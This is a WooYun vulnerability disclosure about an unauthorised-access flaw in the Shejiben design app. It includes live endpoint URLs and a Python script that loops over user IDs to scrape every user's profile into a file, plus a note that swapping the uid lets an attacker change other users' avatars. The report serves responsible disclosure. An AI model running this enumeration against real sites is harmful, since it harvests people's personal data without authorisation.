当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093179

漏洞标题:设计本app越权访问之二(查看任意用户信息,修改用户信息)

相关厂商:土巴兔装修网

漏洞作者: hkAssassin

提交时间:2015-01-22 18:46

修复时间:2015-03-08 18:48

公开时间:2015-03-08 18:48

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-22: 细节已通知厂商并且等待厂商处理中
2015-01-23: 厂商已经确认,细节仅向厂商公开
2015-02-02: 细节向核心白帽子及相关领域专家公开
2015-02-12: 细节向普通白帽子公开
2015-02-22: 细节向实习白帽子公开
2015-03-08: 细节向公众公开

简要描述:

app权限没做任何控制导致可以无障碍查看任意用户信息

详细说明:

问题一:查看任意用户信息

http://www.shejiben.com/mobileapp/my/info.php?uid=1300817  
http://www.shejiben.com//mobileapp/my/index.php?uid=1
这两个地址都可以得到用户信息,这是我做app渗透测试的时候得到的连接,通过pc端也可以访问。
直接变换uid即可得到用户信息,uid在设计本网站上是公开的,所以基本上写一个脚本一刷用户信息全得到。下面是我写的一个简单的脚本:
#coding=utf-8
import urllib
def getHtml(url):
page = urllib.urlopen(url)
html = page.read()
return html
for id in range(1300000,1300999):
if id== 1300999:
break
else:
print str(id)
html = getHtml("http://www.shejiben.com/mobileapp/my/info.php?uid="+str(id))
fileHandle=open('shejiben.txt','a')
fileHandle.write('\n'+html)
fileHandle.close()


下面这张图是我刷到的一些用户信息,截图做个证明(只刷了其中一个链接):

t0.png


问题二:任意修改用户头像
app修改头像处抓包,变换uid即可替换用户头像;截图如下:

t1.png

漏洞证明:

问题一:查看任意用户信息

http://www.shejiben.com/mobileapp/my/info.php?uid=1300817  
http://www.shejiben.com//mobileapp/my/index.php?uid=1
这两个地址都可以得到用户信息,这是我做app渗透测试的时候得到的连接,通过pc端也可以访问。
直接变换uid即可得到用户信息,uid在设计本网站上是公开的,所以基本上写一个脚本一刷用户信息全得到。下面是我写的一个简单的脚本:
#coding=utf-8
import urllib
def getHtml(url):
page = urllib.urlopen(url)
html = page.read()
return html
for id in range(1300000,1300999):
if id== 1300999:
break
else:
print str(id)
html = getHtml("http://www.shejiben.com/mobileapp/my/info.php?uid="+str(id))
fileHandle=open('shejiben.txt','a')
fileHandle.write('\n'+html)
fileHandle.close()


下面这张图是我刷到的一些用户信息,截图做个证明(只刷了其中一个链接):

t0.png


问题二:任意修改用户头像
app修改头像处抓包,变换uid即可替换用户头像;截图如下:

t1.png

修复方案:

权限控制,等着确认了,继续放大招!

版权声明:转载请注明来源 hkAssassin@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-01-23 09:28

厂商回复:

感谢报告

最新状态:

暂无


漏洞评价:

评论